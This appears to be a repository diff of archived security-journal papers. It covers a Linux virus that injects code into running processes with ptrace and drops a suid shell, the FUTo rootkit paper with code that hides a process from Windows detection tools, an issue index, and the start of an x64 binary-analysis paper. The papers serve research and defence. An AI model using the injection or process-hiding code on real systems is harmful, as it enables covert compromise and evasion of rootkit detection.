printf("pid #%d got infected!\n", pid);
|
||||
|
||||
return 1;
|
||||
}
|
||||
|
||||
// Injection Function
|
||||
|
||||
int ptrace_inject(pid_t pid, long memaddr, void *buf, int buflen) {
|
||||
|
||||
long data;
|
||||
|
||||
while (buflen > 0) {
|
||||
memcpy(&data, buf, 4);
|
||||
|
||||
if ( ptrace(PTRACE_POKETEXT, pid, memaddr, data) < 0 ) {
|
||||
perror("Oopsie!");
|
||||
ptrace(PTRACE_DETACH, pid, NULL, NULL);
|
||||
|
||||
return -1;
|
||||
}
|
||||
|
||||
memaddr += 4;
|
||||
buf += 4;
|
||||
buflen -= 4;
|
||||
}
|
||||
|
||||
return 1;
|
||||
}
|
||||
|
||||
A few pointers about the code:
|
||||
|
||||
The virus assembly was written as one chunk, with the pre-virus code
at the top and the virus code at the bottom. It is written in
shellcode programming style, which produces NULL-free and somewhat
optimized code. Since the whole chunk is injected into the infected
process, this also keeps the virus as small as possible, which is
always a good idea.
|
||||
|
||||
The virus code assumes it will run more than once inside a given
infected process. This means that self-modifying actions, such as
fixing NULLs at runtime, first check whether they are needed in the
current virus iteration.
|
||||
|
||||
The virus itself is programmed to drop a suid shell called
|
||||
/tmp/fluffy. Before doing so, it will check if the file
|
||||
exists, and if that is not the case, it will execve() a
|
||||
small hardcoded shell script to generate a suid wrapper. Iteration
|
||||
occurs every 14 secs.
|
||||
|
||||
The signal() syscall resets the signal handler to the default action
after the handler has been called. This means the virus has to
re-register for the signal every time. An alternative is to set up
the signal handler using other signal-related syscalls such as
sigaction() or rt_sigaction(), which is how the libc signal() function
is implemented. signal() was chosen over these syscalls to keep the
code small.
|
||||
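The sigaction() alternative mentioned above can be sketched in ordinary
user-space C. This is a minimal illustration under a POSIX environment,
not part of the virus code; the names on_alarm, install_persistent_handler,
current_ticks and tick_count are made up for this example.

```c
#define _POSIX_C_SOURCE 200809L
#include <signal.h>
#include <string.h>

/* Hypothetical counter, incremented each time the handler runs. */
static volatile sig_atomic_t tick_count = 0;

static void on_alarm(int signo)
{
    (void)signo;
    tick_count++;
}

/* Install on_alarm for SIGALRM. SA_RESETHAND is not set, so the handler
 * stays installed after it fires and never has to be re-registered. */
int install_persistent_handler(void)
{
    struct sigaction sa;

    memset(&sa, 0, sizeof(sa));
    sa.sa_handler = on_alarm;
    sigemptyset(&sa.sa_mask);
    sa.sa_flags = 0;

    return sigaction(SIGALRM, &sa, NULL);
}

/* Number of times the handler has run so far. */
int current_ticks(void)
{
    return (int)tick_count;
}
```

The trade-off described in the text still applies: struct sigaction has
to be built somewhere in memory, which costs more bytes than a plain
signal() call.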
|
||||
|
||||
5.3) Further Design Issues
|
||||
|
||||
Aside from the code itself:
|
||||
|
||||
Injecting at the top of the previous stack page is a safety measure
to ensure the virus code won't overwrite any program related data on
the stack. Testing the virus on the syslogd daemon showed that this
makes sense, as syslogd at some point managed to partly overwrite
the virus code. A common pitfall is NULLs: two overwritten NULL bytes
(e.g. \x00\x00) decode as the valid instruction add %al,(%eax),
which easily leads to a crash.
|
||||
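The address arithmetic behind "previous stack page" is the same
expression the injector uses for infproc_addr. A small sketch, assuming
32-bit addresses and 4k pages; the function name injection_base and the
macro PAGE_SIZE_4K are made up for this example.

```c
#include <stdint.h>

#define PAGE_SIZE_4K 0x1000u

/* Round esp down to the start of its page, then step back one page.
 * Equivalent to (esp & 0xFFFFF000) - 0x1000 for 32-bit values. */
uint32_t injection_base(uint32_t esp)
{
    return (esp & ~(PAGE_SIZE_4K - 1u)) - PAGE_SIZE_4K;
}
```

For example, an ESP of 0xbffff6a4 sits in the page starting at
0xbffff000, so the injection base becomes 0xbfffe000.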
|
||||
Apart from the stack, it is possible to inject the code into the .text
section itself. On x86/IA32, pages are 4k aligned and the program
code itself might not fill up its last page entirely. The gap created
is often referred to as a "cave", and it is an ideal place to park the
virus, assuming of course the virus is small enough to fit into it. But
because the .text section is not writable, the virus must issue
mprotect() on the current page before it can perform self-modifying
actions on itself.
|
||||
|
||||
An easy way to find a suitable process to infect automatically would
be to start an attachment loop from pid zero onward. As the system
boots and enters init 3 (i.e. multiuser), a series of daemons is
launched. Because these daemons start early, their pids are close to
zero; examples are crond, syslogd and inetd.
|
||||
|
||||
|
||||
6) Conclusion
|
||||
|
||||
Implementing a userland scheduler allows external code to run in
harmony with the existing code. Adding this feature to an exploit
scenario of any kind can turn a normal, straightforward shellcode
into a backdoor and more.
|
||||
|
||||
|
||||
References:
|
||||
|
||||
[1] Building ptrace Injecting Shellcodes
|
||||
anonymous
|
||||
http://www.phrack.org/show.php?p=59&a=12;
|
||||
accessed December 29, 2005.
|
||||
|
||||
|
||||
|
379
uninformed/3.6.txt
Normal file
|
@ -0,0 +1,379 @@
|
|||
FUTo
|
||||
Peter Silberman & C.H.A.O.S.
|
||||
|
||||
|
||||
1) Foreword
|
||||
|
||||
Abstract:
|
||||
|
||||
Since the introduction of FU, the rootkit world has moved away from
|
||||
implementing system hooks to hide their presence. Because of this change
|
||||
in offense, a new defense had to be developed. The new algorithms used
|
||||
by rootkit detectors, such as BlackLight, attempt to find what the
|
||||
rootkit is hiding instead of simply detecting the presence of the
|
||||
rootkit's hooks. This paper will discuss an algorithm that is used by
|
||||
both Blacklight and IceSword to detect hidden processes. This paper will
|
||||
also document current weaknesses in the rootkit detection field and
|
||||
introduce a more complete stealth technique implemented as a prototype
|
||||
in FUTo.
|
||||
|
||||
Thanks:
|
||||
|
||||
Peter would like to thank bugcheck, skape, thief, pedram, F-Secure for
|
||||
doing great research, and all the nologin/research'ers who encourage
|
||||
mind growth.
|
||||
|
||||
C.H.A.O.S. would like to thank Amy, Santa (this work was three hours on
|
||||
Christmas day), lonerancher, Pedram, valerino, and HBG Unit.
|
||||
|
||||
|
||||
2) Introduction
|
||||
|
||||
In the past year or two, there have been several major developments in
|
||||
the rootkit world. Recent milestones include the introduction of the FU
|
||||
rootkit, which uses Direct Kernel Object Manipulation (DKOM); the
|
||||
introduction of VICE, one of the first rootkit detection programs; the
|
||||
birth of Sysinternals' Rootkit Revealer and F-Secure's Blacklight, the
|
||||
first mainstream Windows rootkit detection tools; and most recently the
|
||||
introduction of Shadow Walker, a rootkit that hooks the memory manager
|
||||
to hide in plain sight.
|
||||
|
||||
Enter Blacklight and IceSword. The authors chose to investigate the
|
||||
algorithms used by both Blacklight and IceSword because they are
|
||||
considered by many in the field to be the best detection tools.
|
||||
Blacklight, developed by the Finnish security company F-Secure, is
|
||||
primarily concerned with detecting hidden processes. It does not attempt
|
||||
to detect system hooks; it is only concerned with hidden processes.
|
||||
IceSword uses a very similar method to Blacklight. IceSword
|
||||
differentiates itself from Blacklight in that it is a more robust tool
|
||||
allowing the user to see what system calls are hooked, what drivers are
|
||||
hidden, and what TCP/UDP ports are open that programs, such as netstat,
|
||||
do not.
|
||||
|
||||
|
||||
3) Blacklight
|
||||
|
||||
This paper will focus primarily on Blacklight due to its algorithm being
|
||||
the research focus for this paper. Also, it became apparent after
|
||||
researching Blacklight that IceSword used a very similar algorithm.
|
||||
Therefore, if a weakness was found in Blacklight, it would most likely
|
||||
exist in IceSword as well.
|
||||
|
||||
Blacklight takes a userland approach to detecting processes. Although
|
||||
simplistic, its algorithm is amazingly effective. Blacklight uses some
|
||||
very strong anti-debugging features that begin by creating a Thread
|
||||
Local Storage (TLS) callback table. Blacklight's TLS callback attempts
|
||||
to befuddle debuggers by forking the main process before the process
|
||||
object is fully created. This can occur because the TLS callback routine
|
||||
is called before the process is completely initialized. Blacklight also
|
||||
has anti-debugging measures that detect the presence of debuggers
|
||||
attaching to it. Rather than attempting to beat the anti-debugging
|
||||
measures by circumventing the TLS callback and making other program
|
||||
modifications, the authors decided to just disable the TLS routine. To
|
||||
do this, the authors used a tool called LordPE. LordPE allows users to
|
||||
edit PE files. The authors used this tool to zero out the TLS callback
|
||||
table. This disabled the forking routine and gave the authors the
|
||||
ability to use an API Monitor. It should be noted that disabling the
|
||||
callback routine would allow you to attach a debugger, but when the user
|
||||
clicked "scan" in the Blacklight GUI, Blacklight would detect the
|
||||
debugger and exit. Instead of working up a second measure to circumvent
|
||||
the anti-debugging routines, the authors decided to analyze the calls
|
||||
occurring within Blacklight. To this end, the authors used Rohitab's API
|
||||
Monitor.
|
||||
|
||||
In testing, one can see failed calls to the API OpenProcess (tls zero is
|
||||
Blacklight without a TLS table). Blacklight tries opening a process with
|
||||
process id (PID) of 0x1CC, 0x1D0, 0x1D4, 0x1D8 and so on. The authors
|
||||
dubbed the method Blacklight uses as PID Bruteforce (PIDB). Blacklight
|
||||
loops through all possible PIDs, calling OpenProcess on the PIDs in the
|
||||
range of 0x0 to 0x4E1C. Blacklight keeps a list of all processes it is
|
||||
able to open, using the PIDB method. Blacklight then calls
|
||||
CreateToolhelp32Snapshot, which gives Blacklight a second list of
|
||||
processes. Blacklight then compares the two lists, to see if there are
|
||||
any processes in the PIDB list that are not in the list returned by the
|
||||
CreateToolhelp32Snapshot function. If there is any discrepancy, these
|
||||
processes are considered hidden and reported to the user.
|
||||
|
||||
|
||||
3.1) Windows OpenProcess
|
||||
|
||||
In Windows, the OpenProcess function is a wrapper to the NtOpenProcess
|
||||
routine. NtOpenProcess is implemented in the kernel by NTOSKRNL.EXE. The
|
||||
function prototype for NtOpenProcess is:
|
||||
|
||||
NTSTATUS NtOpenProcess (
|
||||
OUT PHANDLE ProcessHandle,
|
||||
IN ACCESS_MASK DesiredAccess,
|
||||
IN POBJECT_ATTRIBUTES ObjectAttributes,
|
||||
IN PCLIENT_ID ClientId OPTIONAL);
|
||||
|
||||
The ClientId parameter is the actual PID that is passed by OpenProcess.
|
||||
This parameter is optional, but during our observation the OpenProcess
|
||||
function always specified a ClientId when calling NtOpenProcess.
|
||||
|
||||
NtOpenProcess performs three primary functions:
|
||||
|
||||
1. It verifies the process exists by calling PsLookupProcessByProcessId.
|
||||
2. It attempts to open a handle to the process by calling
|
||||
ObOpenObjectByPointer.
|
||||
3. If it was successful opening a handle to the process, it passes the
|
||||
handle back to the caller.
|
||||
|
||||
PsLookupProcessByProcessId was the next obvious place for research. One
|
||||
of the outstanding questions was how does PsLookupProcessByProcessId
|
||||
know that a given PID is part of a valid process? The answer becomes
|
||||
clear in the first few lines of the disassembly:
|
||||
|
||||
PsLookupProcessByProcessId:
|
||||
mov edi, edi
|
||||
push ebp
|
||||
mov ebp, esp
|
||||
push ebx
|
||||
push esi
|
||||
mov eax, large fs:124h
|
||||
push [ebp+arg_4]
|
||||
mov esi, eax
|
||||
dec dword ptr [esi+0D4h]
|
||||
push PspCidTable
|
||||
call ExMapHandleToPointer
|
||||
|
||||
From the above disassembly, it is clear that ExMapHandleToPointer
|
||||
queries the PspCidTable for the process ID.
|
||||
|
||||
Now we have a complete picture of how Blacklight detects hidden processes:
|
||||
|
||||
1. Blacklight starts looping through the range of valid process IDs, 0
|
||||
through 0x4E1C.
|
||||
2. Blacklight calls OpenProcess on every possible PID.
|
||||
3. OpenProcess calls NtOpenProcess.
|
||||
4. NtOpenProcess calls PsLookupProcessByProcessId to verify the
|
||||
process exists.
|
||||
5. PsLookupProcessByProcessId uses the PspCidTable to verify the
|
||||
process exists.
|
||||
6. NtOpenProcess calls ObOpenObjectByPointer to get the handle to the
|
||||
process.
|
||||
7. If OpenProcess was successful, Blacklight stores the information
|
||||
about the process and continues to loop.
|
||||
8. Once the process list has been created by exhausting all possible
|
||||
PIDs, Blacklight compares the PIDB list with the list it creates by
|
||||
calling CreateToolhelp32Snapshot. CreateToolhelp32Snapshot is a Win32
|
||||
API that takes a snapshot of all running processes on the system. A
|
||||
discrepancy between the two lists implies that there is a hidden
|
||||
process. This case is reported by Blacklight.
|
||||
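The final comparison in step 8 can be sketched in portable C. This is
only an illustration of the cross-view idea, not Blacklight's code: the
two lists are assumed to have been gathered already (one by the
OpenProcess loop, one from the snapshot), and the names contains_pid and
find_hidden_pids are made up for this example.

```c
#include <stddef.h>

/* Return 1 if pid occurs in list[0..n), else 0. */
static int contains_pid(const unsigned long *list, size_t n, unsigned long pid)
{
    size_t i;

    for (i = 0; i < n; i++) {
        if (list[i] == pid)
            return 1;
    }
    return 0;
}

/* Copy every PID that is in opened[] (the PIDB list) but missing from
 * snapshot[] into hidden[]. Returns the number of PIDs written, which
 * never exceeds hidden_cap. */
size_t find_hidden_pids(const unsigned long *opened, size_t n_opened,
                        const unsigned long *snapshot, size_t n_snapshot,
                        unsigned long *hidden, size_t hidden_cap)
{
    size_t i, n_hidden = 0;

    for (i = 0; i < n_opened && n_hidden < hidden_cap; i++) {
        if (!contains_pid(snapshot, n_snapshot, opened[i]))
            hidden[n_hidden++] = opened[i];
    }
    return n_hidden;
}
```

A linear search is enough for a sketch; a real tool comparing thousands
of PIDs would more likely sort both lists or use a bitmap.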
|
||||
|
||||
3.2) The PspCidTable
|
||||
|
||||
The PspCidTable is a "handle table for process and thread client IDs".
|
||||
Every process' PID corresponds to its location in the PspCidTable. The
|
||||
PspCidTable is a pointer to a HANDLE_TABLE structure.
|
||||
|
||||
typedef struct _HANDLE_TABLE {
|
||||
PVOID p_hTable;
|
||||
PEPROCESS QuotaProcess;
|
||||
PVOID UniqueProcessId;
|
||||
EX_PUSH_LOCK HandleTableLock [4];
|
||||
LIST_ENTRY HandleTableList;
|
||||
EX_PUSH_LOCK HandleContentionEvent;
|
||||
PHANDLE_TRACE_DEBUG_INFO DebugInfo;
|
||||
DWORD ExtraInfoPages;
|
||||
DWORD FirstFree;
|
||||
DWORD LastFree;
|
||||
DWORD NextHandleNeedingPool;
|
||||
DWORD HandleCount;
|
||||
DWORD Flags;
|
||||
} HANDLE_TABLE, *PHANDLE_TABLE;
|
||||
|
||||
Windows offers a variety of non-exported functions to manipulate and retrieve
|
||||
information from the PspCidTable. These include:
|
||||
|
||||
- [ExCreateHandleTable] creates non-process handle tables. The
|
||||
objects within all handle tables except the PspCidTable are pointers
|
||||
to object headers and not the address of the objects themselves.
|
||||
- [ExDupHandleTable] is called when spawning a process.
|
||||
- [ExSweepHandleTable] is used for process rundown.
|
||||
- [ExDestroyHandleTable] is called when a process is exiting.
|
||||
- [ExCreateHandle] creates new handle table entries.
|
||||
- [ExChangeHandle] is used to change the access mask on a handle.
|
||||
- [ExDestroyHandle] implements the functionality of CloseHandle.
|
||||
- [ExMapHandleToPointer] returns the address of the object corresponding to the handle.
|
||||
- [ExReferenceHandleDebugIn] is used for tracing handles.
|
||||
- [ExSnapShotHandleTables] is used for handle searchers (for example in oh.exe).
|
||||
|
||||
Below is code that uses non-exported functions to remove a process
|
||||
object from the PspCidTable. It uses hardcoded addresses for the
|
||||
non-exported functions necessary; however, a rootkit could find these
|
||||
function addresses dynamically.
|
||||
|
||||
typedef PHANDLE_TABLE_ENTRY (*ExMapHandleToPointerFUNC)
|
||||
( IN PHANDLE_TABLE HandleTable,
|
||||
IN HANDLE ProcessId);
|
||||
|
||||
void HideFromBlacklight(DWORD eproc)
|
||||
{
|
||||
PHANDLE_TABLE_ENTRY CidEntry;
|
||||
ExMapHandleToPointerFUNC map;
|
||||
ExUnlockHandleTableEntryFUNC umap;
|
||||
PEPROCESS p;
|
||||
CLIENT_ID ClientId;
|
||||
|
||||
map = (ExMapHandleToPointerFUNC)0x80493285;
|
||||
|
||||
CidEntry = map((PHANDLE_TABLE)0x8188d7c8,
|
||||
LongToHandle( *((DWORD*)(eproc+PIDOFFSET)) ) );
|
||||
if(CidEntry != NULL)
|
||||
{
|
||||
CidEntry->Object = 0;
|
||||
}
|
||||
return;
|
||||
}
|
||||
|
||||
Since the job of the PspCidTable is to keep track of all the processes
|
||||
and threads, it is logical that a rootkit detector could use the
|
||||
PspCidTable to find hidden processes. However, relying on a single data
|
||||
structure is not a very robust algorithm. If a rootkit alters this one
|
||||
data structure, the operating system and other programs will have no
|
||||
idea that the hidden process exists. New rootkit detection algorithms
|
||||
should be devised that have overlapping dependencies so that a single
|
||||
change will not go undetected.
|
||||
|
||||
|
||||
4) FUTo
|
||||
|
||||
To demonstrate the weaknesses in the algorithms currently used by
|
||||
rootkit detection software such as Blacklight and IceSword, the authors
|
||||
have created FUTo. FUTo is a new version of the FU rootkit. FUTo has
|
||||
the added ability to manipulate the PspCidTable without using any
|
||||
function calls. It uses DKOM techniques to hide particular objects
|
||||
within the PspCidTable.
|
||||
|
||||
There were some design considerations when implementing the new features
|
||||
in FUTo. The first was that, like the ExMapHandleXXX functions, the
|
||||
PspCidTable is not exported by the kernel. In order to overcome this,
|
||||
FUTo automatically detects the PspCidTable by finding the
|
||||
PsLookupProcessByProcessId function and disassembling it looking for the
|
||||
first function call. At the time of this writing, the first function
|
||||
call is always to ExMapHandleToPointer. ExMapHandleToPointer takes the
|
||||
PspCidTable as its first parameter. Using this knowledge, it is fairly
|
||||
straightforward to find the PspCidTable.
|
||||
|
||||
PsLookupProcessByProcessId:
|
||||
mov edi, edi
|
||||
push ebp
|
||||
mov ebp, esp
|
||||
push ebx
|
||||
push esi
|
||||
mov eax, large fs:124h
|
||||
push [ebp+arg_4]
|
||||
mov esi, eax
|
||||
dec dword ptr [esi+0D4h]
|
||||
push PspCidTable
|
||||
call ExMapHandleToPointer
|
||||
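The search described above amounts to a byte-pattern scan over the
start of the function. The following is a hedged sketch that works on
an ordinary byte buffer rather than kernel memory. It assumes that the
"push PspCidTable" shown in the listing is encoded as a memory-operand
push (opcode bytes FF 35 followed by a 32-bit address) and that the call
is a near relative call (E8); the function name find_pushed_operand is
made up for this example.

```c
#include <stddef.h>
#include <stdint.h>

/* Scan code[0..len) for "FF 35 <addr32>" (push dword ptr [addr32])
 * immediately followed by "E8" (call rel32). On success, store addr32
 * in *out and return 1. Return 0 if the pattern is not found. */
int find_pushed_operand(const uint8_t *code, size_t len, uint32_t *out)
{
    size_t i;

    /* The pattern needs 7 bytes: FF 35, four address bytes, E8. */
    for (i = 0; i + 7 <= len; i++) {
        if (code[i] == 0xFF && code[i + 1] == 0x35 && code[i + 6] == 0xE8) {
            /* Assemble the little-endian 32-bit operand byte by byte. */
            *out = (uint32_t)code[i + 2]
                 | ((uint32_t)code[i + 3] << 8)
                 | ((uint32_t)code[i + 4] << 16)
                 | ((uint32_t)code[i + 5] << 24);
            return 1;
        }
    }
    return 0;
}
```

A scan like this depends entirely on the compiler emitting that exact
instruction pair in that order.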
|
||||
A more robust method to find the PspCidTable could be written as this
|
||||
algorithm will fail if even simple compiler optimizations are made on
|
||||
the kernel. Opc0de wrote a more robust method to detect non-exported
|
||||
variables like PspCidTable, PspActiveProcessHead, PspLoadedModuleList,
|
||||
etc. Opc0de's method does not require memory scanning like the method
|
||||
currently used in FUTo. Instead Opc0de found that the KdVersionBlock
|
||||
field in the Processor Control Region structure pointed to a structure
|
||||
KDDEBUGGER_DATA32. The structure looks like this:
|
||||
|
||||
typedef struct _KDDEBUGGER_DATA32 {
|
||||
|
||||
DBGKD_DEBUG_DATA_HEADER32 Header;
|
||||
ULONG KernBase;
|
||||
ULONG BreakpointWithStatus; // address of breakpoint
|
||||
ULONG SavedContext;
|
||||
USHORT ThCallbackStack; // offset in thread data
|
||||
USHORT NextCallback; // saved pointer to next callback frame
|
||||
USHORT FramePointer; // saved frame pointer
|
||||
USHORT PaeEnabled:1;
|
||||
ULONG KiCallUserMode; // kernel routine
|
||||
ULONG KeUserCallbackDispatcher; // address in ntdll
|
||||
|
||||
ULONG PsLoadedModuleList;
|
||||
ULONG PsActiveProcessHead;
|
||||
ULONG PspCidTable;
|
||||
|
||||
ULONG ExpSystemResourcesList;
|
||||
ULONG ExpPagedPoolDescriptor;
|
||||
ULONG ExpNumberOfPagedPools;
|
||||
|
||||
[...]
|
||||
|
||||
ULONG KdPrintCircularBuffer;
|
||||
ULONG KdPrintCircularBufferEnd;
|
||||
ULONG KdPrintWritePointer;
|
||||
ULONG KdPrintRolloverCount;
|
||||
|
||||
ULONG MmLoadedUserImageList;
|
||||
|
||||
} KDDEBUGGER_DATA32, *PKDDEBUGGER_DATA32;
|
||||
|
||||
As the reader can see, the structure contains pointers to many of the
|
||||
commonly needed/used non-exported variables. This is one more robust
|
||||
method of finding the PspCidTable and other variables like it.
|
||||
|
||||
The second design consideration was a little more troubling. When FUTo
|
||||
removes an object from the PspCidTable, the HANDLE_ENTRY is replaced with
|
||||
NULLs representing the fact that the process "does not exist." The
|
||||
problem then occurs when the process that is hidden (and has no
|
||||
PspCidTable entries) is closed. When the system tries to close the
|
||||
process, it will index into the PspCidTable and dereference a null
|
||||
object causing a blue screen. The solution to this problem is simple but
|
||||
not elegant. First, FUTo sets up a process notify routine by calling
|
||||
PsSetCreateProcessNotifyRoutine. The callback function will be invoked
|
||||
whenever a process is created, but more importantly it will be called
|
||||
whenever a process is deleted. The callback executes before the hidden
|
||||
process is terminated; therefore, it gets called before the system
|
||||
crashes. When FUTo deletes the indexes that contain objects that point
|
||||
to the rogue process, FUTo will save the value of the HANDLE_ENTRYs and
|
||||
the index for later use. When the process is closed, FUTo will restore
|
||||
the objects before the process is closed allowing the system to
|
||||
dereference valid objects.
|
||||
|
||||
5) Conclusion
|
||||
|
||||
The catch phrase in 2005 was, ``We are raising the bar [again] for
|
||||
rootkit detection''. Hopefully the reader has walked away with a better
|
||||
understanding of how the top rootkit detection programs are detecting
|
||||
hidden processes and how they can be improved. Some readers may ask
|
||||
"What can I do?" Well, the simple solution is not to connect to the
|
||||
Internet, but a combination of Blacklight, IceSword, and
|
||||
Rootkit Revealer will greatly improve your chances of staying rootkit free.
|
||||
A new tool called RAIDE (Rootkit Analysis Identification Elimination)
|
||||
will be unveiled in the coming months at Blackhat Amsterdam. This new
|
||||
tool does not suffer from the problems brought forth here.
|
||||
|
||||
Bibliography
|
||||
|
||||
Blacklight Homepage. F-Secure Blacklight
|
||||
http://www.f-secure.com/blacklight/
|
||||
|
||||
|
||||
FU Project Page. FU
|
||||
http://www.rootkit.com/project.php?id=12
|
||||
|
||||
|
||||
IceSword Homepage. IceSword
|
||||
http://www.xfocus.net/tools/200505/1032.html
|
||||
|
||||
|
||||
LordPE Homepage. LordPE Info
|
||||
http://mitglied.lycos.de/yoda2k/LordPE/info.htm
|
||||
|
||||
|
||||
Opc0de. 2005. How to get some hidden kernel variables without scanning
|
||||
http://www.rootkit.com/newsread.php?newsid=101
|
||||
|
||||
|
||||
Rohitabs API Monitor. API Monitor - Spy on API calls
|
||||
http://www.rohitab.com/apimonitor/
|
||||
|
||||
|
||||
Russinovich, Solomon. Microsoft Windows Internals Fourth Edition.
|
||||
|
||||
|
||||
Silberman. RAIDE:Rootkit Analysis Identification Elimination
|
||||
http://www.blackhat.com/html/bh-europe-06/bh-eu-06-speakers.html#Silberman
|
35
uninformed/3.txt
Normal file
|
@ -0,0 +1,35 @@
|
|||
Engineering in Reverse
|
||||
Bypassing PatchGuard on Windows x64
|
||||
skape & Skywing
|
||||
The version of the Windows kernel that runs on the x64 platform has introduced a new feature, nicknamed PatchGuard, that is intended to prevent both malicious software and third-party vendors from modifying certain critical operating system structures. These structures include things like specific system images, the SSDT, the IDT, the GDT, and certain critical processor MSRs. This feature is intended to ensure kernel stability by preventing uncondoned behavior, such as hooking. However, it also has the side effect of preventing legitimate products from working properly. For that reason, this paper will serve as an in-depth analysis of PatchGuard's inner workings with an eye toward techniques that can be used to bypass it. Possible solutions will also be proposed for the bypass techniques that are suggested.
|
||||
pdf | txt | html
|
||||
|
||||
Exploitation Technology
|
||||
Windows Kernel-mode Payload Fundamentals
|
||||
bugcheck & skape
|
||||
This paper discusses the theoretical and practical implementations of kernel-mode payloads on Windows. At the time of this writing, kernel-mode research is generally regarded as the realm of a few, but it is hoped that documents such as this one will encourage a thoughtful progression of the subject matter. To that point, this paper will describe some of the general techniques and algorithms that may be useful when implementing kernel-mode payloads. Furthermore, the anatomy of a kernel-mode payload will be broken down into four distinct units, known as payload components, and explained in detail. In the end, the reader should walk away with a concrete understanding of the way in which kernel-mode payloads operate on Windows.
|
||||
pdf | txt | html
|
||||
|
||||
Fuzzing
|
||||
Analyzing Common Binary Parser Mistakes
|
||||
Orlando Padilla
|
||||
With just about one file format bug being consistently released on a weekly basis over the past six to twelve months, one can only hope developers would look and learn. The reality of it all is unfortunate; no one cares enough. These bugs have been around for some time now, but have only recently gained media attention due to the large number of vulnerabilities being released. Researchers have been finding more elaborate and passive attack vectors for these bugs, some of which can even leverage a remote compromise.
|
||||
pdf | txt | code.tgz | html
|
||||
|
||||
General Research
|
||||
Attacking NTLM with Precomputed Hashtables
|
||||
Warlord
|
||||
Breaking encrypted passwords has been of interest to hackers for a long time, and protecting them has always been one of the biggest security problems operating systems have faced, with Microsoft's Windows being no exception. Due to errors in the design of the password encryption scheme, especially in the LanMan (LM) scheme, Windows has a bad track record in this field of information security. Over the last couple of years in particular, the outdated DES encryption algorithm that LanMan is based on has faced more and more processing power in the average household, which, combined with ever increasing hard disk sizes, has made it crystal clear that LanMan nowadays is not just outdated, but even antiquated.
|
||||
pdf | txt | html
|
||||
|
||||
Linux Improvised Userland Scheduler Virus
|
||||
Izik
|
||||
This paper discusses the combination of a userland scheduler and runtime process infection for a virus. These two concepts complete each other. The runtime process infection opens the door to invading into other processes, and the userland scheduler provides a way to make the injected code coexist with the original process code. This allows the virus to remain stealthy and active inside an infected process.
|
||||
pdf | txt | html
|
||||
|
||||
Rootkit Technology
|
||||
FUTo
|
||||
Peter Silberman & C.H.A.O.S.
|
||||
Since the introduction of FU, the rootkit world has moved away from implementing system hooks to hide their presence. Because of this change in offense, a new defense had to be developed. The new algorithms used by rootkit detectors, such as BlackLight, attempt to find what the rootkit is hiding instead of simply detecting the presence of the rootkit's hooks. This paper will discuss an algorithm that is used by both Blacklight and IceSword to detect hidden processes. This paper will also document current weaknesses in the rootkit detection field and introduce a more complete stealth technique implemented as a prototype in FUTo.
|
||||
pdf | txt | code.tgz | html
|
||||
|
686
uninformed/4.4.txt
Normal file
|
@ -0,0 +1,686 @@
|
|||
Improving Automated Analysis of Windows x64 Binaries
|
||||
April 2006
|
||||
skape
|
||||
mmiller@hick.org
|
||||
|
||||
|
||||
1) Foreword
|
||||
|
||||
Abstract: As Windows x64 becomes a more prominent platform, it will
|
||||
become necessary to develop techniques that improve the binary analysis
|
||||
process. In particular, automated techniques that can be performed
|
||||
prior to doing code or data flow analysis can be useful in getting a
|
||||
better understanding for how a binary operates. To that point, this
|
||||
paper gives a brief explanation of some of the changes that have been
|
||||
made to support Windows x64 binaries. From there, a few basic
|
||||
techniques are illustrated that can be used to improve the process of
|
||||
identifying functions, annotating their stack frames, and describing
|
||||
their exception handler relationships. Source code to an example IDA
|
||||
plugin is also included that shows how these techniques can be
|
||||
implemented.
|
||||
|
||||
Thanks: The author would like to thank bugcheck, sh0k, jt, spoonm, and
|
||||
Skywing.
|
||||
|
||||
Update: The article in MSDN magazine by Matt Pietrek was
|
||||
published after this article was written. However, it contains a
|
||||
lot of useful information and touches on many of the same topics
|
||||
that this article covers in the background chapter. The article can
|
||||
be found here:
|
||||
http://msdn.microsoft.com/msdnmag/issues/06/05/x64/default.aspx.
|
||||
|
||||
With that, on with the show
|
||||
|
||||
|
||||
2) Introduction
|
||||
|
||||
The demand for techniques that can be used to improve the analysis
|
||||
process of Windows x64 binaries will only increase as the Windows x64
|
||||
platform becomes more accepted and used in the market place. There is a
|
||||
deluge of useful information surrounding techniques that can be used to
|
||||
perform code and data flow analysis that is also applicable to the x64
|
||||
architecture. However, techniques that can be used to better annotate
|
||||
and streamline the initial analysis phases, such as identifying
|
||||
functions and describing their stack frames, are still a ripe area for
|
||||
improvement at the time of this writing. For that reason, this paper
|
||||
will start by describing some of the changes that have been made to
|
||||
support Windows x64 binaries. This background information is useful
|
||||
because it serves as a basis for understanding a few basic techniques
|
||||
that may be used to improve some of the initial analysis phases. During
|
||||
the course of this paper, the term Windows x64 binary will simply be
|
||||
reduced to x64 binary in the interest of brevity.
|
||||
|
||||
|
||||
3) Background
|
||||
|
||||
Prior to diving into some of the analysis techniques that can be
|
||||
performed on x64 binaries, it's first necessary to learn a bit about
|
||||
some of the changes that were made to support the x64 architecture.
|
||||
This chapter will give a very brief explanation of some of the things
|
||||
that have been introduced, but will by no means attempt to act as an
|
||||
authoritative reference.
|
||||
|
||||
|
||||
3.1) PE32+ Image File Format
|
||||
|
||||
The image file format for the x64 platform is known as PE32+. As one
|
||||
would expect, the file format is derived from the PE file format with
|
||||
only very slight modifications. For instance, 64-bit binaries contain
|
||||
an IMAGE_OPTIONAL_HEADER64 rather than an IMAGE_OPTIONAL_HEADER. The
|
||||
differences between these two structures are described in the table
|
||||
below:
|
||||
|
||||
Field              | PE    | PE32+
-------------------+-------+------------------------------
BaseOfData         | ULONG | Removed from structure
ImageBase          | ULONG | ULONGLONG
SizeOfStackReserve | ULONG | ULONGLONG
SizeOfStackCommit  | ULONG | ULONGLONG
SizeOfHeapReserve  | ULONG | ULONGLONG
SizeOfHeapCommit   | ULONG | ULONGLONG
-------------------+-------+------------------------------
|
||||
|
||||
In general, any structure attribute in the PE image that made reference
|
||||
to a 32-bit virtual address directly rather than through an RVA (Relative
|
||||
Virtual Address) has been expanded to a 64-bit attribute in PE32+. Other
|
||||
examples of this include the IMAGE_TLS_DIRECTORY structure and the
|
||||
IMAGE_LOAD_CONFIG_DIRECTORY structure.
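
In practice, the two formats can be told apart by the Magic field at the start of the optional header, which is 0x10b for PE and 0x20b for PE32+. The following is a minimal sketch, assuming the whole file has already been read into memory. The helper names (rd16, rd32, pe_optional_magic) are made up for illustration and are not part of any Microsoft header.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define PE_MAGIC_PE32      0x010b  /* IMAGE_NT_OPTIONAL_HDR32_MAGIC */
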